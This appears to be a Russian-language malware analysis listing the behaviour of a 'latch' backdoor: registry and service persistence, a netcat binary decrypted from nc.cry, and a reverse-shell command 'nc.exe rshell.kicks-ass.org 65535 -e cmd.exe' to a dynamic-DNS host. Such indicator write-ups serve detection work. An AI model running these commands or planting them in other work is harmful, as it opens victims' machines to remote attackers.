Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\latch] 'Start' = '00000002'
- %WINDIR%\latch\nc.exe rshell.kicks-ass.org 65535 -e cmd.exe
- %WINDIR%\latch\crypt.exe -decrypt -key secret -infile nc.cry -outfile nc.exe
- <SYSTEM32>\sc.exe start latch
- <SYSTEM32>\sc.exe create latch binPath= "cmd /c start \"\" \"%WINDIR%\latch\latch.bat\"" start= auto
- <SYSTEM32>\ping.exe -w 1000 -n 5 127.0.0.1
- <SYSTEM32>\cmd.exe /c start "" "%WINDIR%\latch\latch.bat"
- <SYSTEM32>\sc.exe delete latch
- <SYSTEM32>\taskkill.exe /f /fi "imagename eq cmd.exe" /fi "username eq SYSTEM"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\latch.bat" "
- <SYSTEM32>\sc.exe stop latch
- <SYSTEM32>\taskkill.exe /f /im "nc.exe"
- %WINDIR%\latch\nc.cry
- %WINDIR%\latch\crypt.exe
- %WINDIR%\latch\nc.exe
- %WINDIR%\latch\latch.bat
- %TEMP%\1.tmp\latch.bat
- %TEMP%\1.tmp\nc.cry
- %TEMP%\1.tmp\crypt.exe
- %TEMP%\1.tmp\latch.bat
- %TEMP%\1.tmp\crypt.exe
- %TEMP%\1.tmp\nc.cry
- 'rs####.kicks-ass.org':65535
- DNS ASK rs####.kicks-ass.org
- '<IP-адрес в локальной сети>':1037
- ClassName: '' WindowName: ''